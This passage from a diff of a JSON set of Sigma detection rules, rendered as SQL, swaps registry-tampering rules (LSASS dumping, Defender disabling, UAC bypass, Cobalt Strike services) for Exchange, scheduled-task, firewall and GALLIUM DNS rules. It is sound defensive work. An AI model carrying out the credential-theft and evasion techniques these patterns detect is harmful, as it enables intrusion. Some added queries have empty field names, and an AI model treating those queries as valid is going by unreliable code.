"33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Legitimate installations of exchange TransportAgents. 
AssemblyPath is a good indicator for this." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT 
((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "author": "frack113", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Legitimate use" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 
'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_treatas_persistence.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing 
registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "status": "experimental", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.004" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). 
Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "status": "experimental", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct 
data destructive activities", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", - "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], - "level": "medium", + 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "description": "Detects when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR 
ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE 
'%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Legitimate admin script" - ], + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject 
LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_firewall_as_delete_rule.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], + 
"title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a 
regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", - 